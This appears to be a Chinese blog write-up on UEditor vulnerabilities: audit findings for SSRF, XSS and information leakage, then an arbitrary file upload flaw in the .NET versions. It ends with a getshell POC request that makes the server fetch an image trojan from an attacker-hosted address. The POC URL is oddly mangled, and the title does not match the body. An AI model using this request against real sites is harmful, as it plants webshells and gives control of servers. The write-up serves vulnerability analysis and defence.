目录
ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现
UEditor 是由百度开发的开源富文本编辑器,开源基于 BSD 协议 ,
小巧灵活 ,使用简单 ,有很多 web 程序在使用 UEditor 编辑器 。
1、项目所使用的 UEditor 组件存在 ssrf 漏洞
风险级别 : 低风险
风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限
2、项目所使用的 UEditor 组件存在 xml 文件上传触发存储型 XSS 漏洞
风险级别 : 中风险
风险分析 : 可通过此漏洞盗取用户凭证,为黑产引流
3、项目所使用的 UEditor 组件目录下存在敏感信息泄漏
风险级别 : 中风险
风险分析 : 可通过此漏洞泄漏信息
1、文件上传漏洞
该任意文件上传漏洞存在于 1.4.3.3 、 1.5.0 和 1.3.6 版本中 ,
并且只有 ** .NET ** 版本受该漏洞影响 。
黑客可以利用该漏洞上传木马文件,执行命令控制服务器 。
ueditor 中已经下架 .net 版本 ,但历史版本中可以下载 1.4.3 版本 ,
但是否是 1.4.3.3 目前还没验证 。
* 该漏洞是由于 上传文件 时 ,使用的 CrawlerHandler 类未对 文件类型 进行检验 ,
导致了任意文件上传 。1.4.3.3 和 1.5.0 版本利用方式稍有不同 ,
1.4.3.3 需要一个能正确解析的域名 。而 1.5.0 用 IP 和 普通域名 都可以 。
* 相对来说 1.5.0 版本更加容易触发此漏洞 ;
而在 1.4.3.3 版本中攻击者需要提供一个正常的域名地址就可以绕过判断 ;
首先 1.5.0 版本进行测试 ,需要先在外网服务器上传一个图片木马 ,
比如 : 1.jpg/1.gif/1.png 都可以 ,下面 x.x.x.x 是外网服务器地址 ,
source[] 参数值改为图片木马地址 ,并在结尾加上 “?.aspx” 即可 getshell ,利用 POC :
POST /ueditor/net/controller.ashx?action=catchimage source%5B%5D=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttp%2Fx.x.x.x/1.gif?.aspx
复现成功会返回路径信息,可以看到木马已经成功被传上去了。